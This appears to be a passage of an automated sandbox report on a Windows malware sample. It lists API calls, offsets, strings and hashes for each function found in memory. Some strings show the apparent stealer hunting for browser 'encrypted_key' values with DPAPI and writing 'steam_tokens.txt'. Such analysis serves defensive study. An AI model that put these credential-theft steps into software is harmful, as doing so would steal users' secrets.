                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID: Windows 11
                                • API String ID: 3225020163-2517555085
                                • Opcode ID: 0fe920702db86d43bc4c91a668d2a04670e99d12e9aef0a956c53a5778818444
                                • Instruction ID: 6f3ddc6836efe311912cbf55e35eddbdb162a39cbf63bab2d659a803e161d47b
                                • Opcode Fuzzy Hash: 0fe920702db86d43bc4c91a668d2a04670e99d12e9aef0a956c53a5778818444
                                • Instruction Fuzzy Hash: C601A271600219BBDB30DFA4FC4DFAE77ADEB44215F100158FE08D6248E6749A4487A0
                                APIs
                                • LoadLibraryA.KERNEL32(?), ref: 00FF723E
                                • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00FF7279
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00FF7280
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00FF72C3
                                • HeapFree.KERNEL32(00000000), ref: 00FF72CA
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00FF7329
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                                • String ID:
                                • API String ID: 174687898-0
                                • Opcode ID: c2dd71803276c4277ae2075c325fef254b1769d0d589d4b0b66a0099eb3e399d
                                • Instruction ID: 03e50b1f5e2e6d3e34d21f03df17ddfe3230aa1cc2fde7649fb4d6303639e4d8
                                • Opcode Fuzzy Hash: c2dd71803276c4277ae2075c325fef254b1769d0d589d4b0b66a0099eb3e399d
                                • Instruction Fuzzy Hash: 73414E71A05709ABDB20DF69E884BBAF3E8FF88315F144569ED4DC7350E631E940AB50
                                APIs
                                • memset.MSVCRT ref: 0100D7D6
                                • RegOpenKeyExA.ADVAPI32(80000001,00D6DA90,00000000,00020119,?), ref: 0100D7F5
                                • RegQueryValueExA.ADVAPI32(?,00D6ECB8,00000000,00000000,00000000,000000FF), ref: 0100D819
                                • RegCloseKey.ADVAPI32(?), ref: 0100D823
                                • lstrcat.KERNEL32(?,00000000), ref: 0100D848
                                • lstrcat.KERNEL32(?,00D6EE20), ref: 0100D85C
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$CloseOpenQueryValuememset
                                • String ID:
                                • API String ID: 2623679115-0
                                • Opcode ID: bbcadfc3f2c38d1bc887f15c6733ff1ed3b18dab00ce2541bef0cd087311ed31
                                • Instruction ID: cdc2f61df04106d1be692758814a7631fba74e255e51dee39318a740d39517ba
                                • Opcode Fuzzy Hash: bbcadfc3f2c38d1bc887f15c6733ff1ed3b18dab00ce2541bef0cd087311ed31
                                • Instruction Fuzzy Hash: F141937161010CAFDB64EF64EC86ADD77B8AF54304F008064FA0997290EB39EB899F91
                                APIs
                                • lstrcpy.KERNEL32(00000000), ref: 00FF9CA8
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00FF9CDA
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00FF9D03
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocLocallstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2746078483-738592651
                                • Opcode ID: ce5d4687b9a2f53b017bdaafe0cfd640cd541d0456728f069244027d8c750e1b
                                • Instruction ID: fa779106ef27f5e08d5967889f33af6ce3db5f7cd20837090a0b9cbc84e9c4ac
                                • Opcode Fuzzy Hash: ce5d4687b9a2f53b017bdaafe0cfd640cd541d0456728f069244027d8c750e1b
                                • Instruction Fuzzy Hash: DC41B031E0420E9BCB21EF64DC457BE77B4AF94314F144468EA55AB2A2DBB4ED00EB90
                                APIs
                                • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0100EA24
                                • lstrcpy.KERNEL32(00000000,?), ref: 0100EA53
                                • lstrcat.KERNEL32(?,00000000), ref: 0100EA61
                                • lstrcat.KERNEL32(?,01021794), ref: 0100EA7A
                                • lstrcat.KERNEL32(?,00D68850), ref: 0100EA8D
                                • lstrcat.KERNEL32(?,01021794), ref: 0100EA9F
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FolderPathlstrcpy
                                • String ID:
                                • API String ID: 818526691-0
                                • Opcode ID: bcd55da00f506730e91dd39700931e14bb2193d4b5eabe6ab3bc76c114b98f26
                                • Instruction ID: 4c2bdeee3b75ca9a8b517e64a90593f0186ba0c96cb120542f090e60415f5004
                                • Opcode Fuzzy Hash: bcd55da00f506730e91dd39700931e14bb2193d4b5eabe6ab3bc76c114b98f26
                                • Instruction Fuzzy Hash: 7641827191011CAFDB75EF64EC45AFD73B4BF98300F0048A8FA1A97294DB789E849B90
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 0100ECDF
                                • lstrlen.KERNEL32(00000000), ref: 0100ECF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100ED1D
                                • lstrlen.KERNEL32(00000000), ref: 0100ED24
                                • lstrcpy.KERNEL32(00000000,steam_tokens.txt), ref: 0100ED52
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID: steam_tokens.txt
                                • API String ID: 367037083-401951677
                                • Opcode ID: 7b1a42ae5a96613fbae5123df466b10ae7d27ec090b5b56e77feef524d61791a
                                • Instruction ID: 4b617fd8de2a82cdab60f81943008ed4e8611b6e4679c761c6ccf72edaed3733
                                • Opcode Fuzzy Hash: 7b1a42ae5a96613fbae5123df466b10ae7d27ec090b5b56e77feef524d61791a
                                • Instruction Fuzzy Hash: 8531B431A101195BE772BF7CEC4AA6E7BA8AF40300F041474FA85EB2A2DB6CDC1567C1
                                APIs
                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,00FF140E), ref: 00FF9A9A
                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00FF140E), ref: 00FF9AB0
                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,00FF140E), ref: 00FF9AC7
                                • ReadFile.KERNEL32(00000000,00000000,?,00FF140E,00000000,?,?,?,00FF140E), ref: 00FF9AE0
                                • LocalFree.KERNEL32(?,?,?,?,00FF140E), ref: 00FF9B00
                                • CloseHandle.KERNEL32(00000000,?,?,?,00FF140E), ref: 00FF9B07
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                • String ID:
                                • API String ID: 2311089104-0
                                • Opcode ID: 26ab96a225ca5e1f0980af24efb29611c930bfa4396cbc26b28c5d2fa671e375
                                • Instruction ID: add6a15d5767f2f7f2301a4a15f8c4401edeca2765e9bc989f246497613c46e2
                                • Opcode Fuzzy Hash: 26ab96a225ca5e1f0980af24efb29611c930bfa4396cbc26b28c5d2fa671e375
                                • Instruction Fuzzy Hash: 1C114F71A04219AFEB20DE69EC88FBE736CEF44354F104159FB0196290D7B4DE40DB60
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 01015B14
                                  • Part of subcall function 0101A173: std::exception::exception.LIBCMT ref: 0101A188
                                  • Part of subcall function 0101A173: std::exception::exception.LIBCMT ref: 0101A1AE
                                • memmove.MSVCRT(00000000,00000000,?,00000000,00000000,00000000), ref: 01015B7C
                                • memmove.MSVCRT(00000000,?,?), ref: 01015B89
                                • memmove.MSVCRT(00000000,?,?), ref: 01015B98
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: memmove$std::exception::exception$Xinvalid_argumentstd::_
                                • String ID: vector<T> too long
                                • API String ID: 2052693487-3788999226
                                • Opcode ID: 8a7a49d4169fa2454e5de1abd2373480027712a4f51f37f3cb49fd9baea35ff8
                                • Instruction ID: d0d65284dbe0d66c99198758f741689bcb6090c30aa6282cc44df0fde1fa3c0f
                                • Opcode Fuzzy Hash: 8a7a49d4169fa2454e5de1abd2373480027712a4f51f37f3cb49fd9baea35ff8
                                • Instruction Fuzzy Hash: D7417F71B001199FCF18DF6CCD95AAEBBF5EB89210F148269E909EB348E634DD01CB90
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: String___crt$Typememset
                                • String ID:
                                • API String ID: 3530896902-3916222277
                                • Opcode ID: dd9284555b5582e1e00358eacaea678d0eb77393f21885b9d3015fd7f4f22340
                                • Instruction ID: 9ec4140460f662a9a53dce104bc237cf42d74732a0b87620877452329263ac59
                                • Opcode Fuzzy Hash: dd9284555b5582e1e00358eacaea678d0eb77393f21885b9d3015fd7f4f22340
                                • Instruction Fuzzy Hash: 0341E87150075C9EEB318B28CC94FFB7BFCAB45708F1844ECDAC686186E2759A858F60
                                APIs
                                • std::_Xinvalid_argument.LIBCPMT ref: 01007D58
                                  • Part of subcall function 0101A1C0: std::exception::exception.LIBCMT ref: 0101A1D5
                                  • Part of subcall function 0101A1C0: std::exception::exception.LIBCMT ref: 0101A1FB
                                • std::_Xinvalid_argument.LIBCPMT ref: 01007D76
                                • std::_Xinvalid_argument.LIBCPMT ref: 01007D91
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_$std::exception::exception
                                • String ID: invalid string position$string too long
                                • API String ID: 3310641104-4289949731
                                • Opcode ID: 92e592118c1fba7419bd7732304c8f3c688ee058a4f38cc0af54c40edc2a79f3
                                • Instruction ID: 221a52980bcb14c2bede6a2cfc36e8303981f5a3b5fcd0ad2ebcb483e6bab575
                                • Opcode Fuzzy Hash: 92e592118c1fba7419bd7732304c8f3c688ee058a4f38cc0af54c40edc2a79f3
                                • Instruction Fuzzy Hash: 6D21E6323002408BE722EE6CD880A7AB7F5AF95760F244A6FE5C1CB381D774EC008361
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 010133EF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 010133F6
                                • GlobalMemoryStatusEx.KERNEL32 ref: 01013411
                                • wsprintfA.USER32 ref: 01013437
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
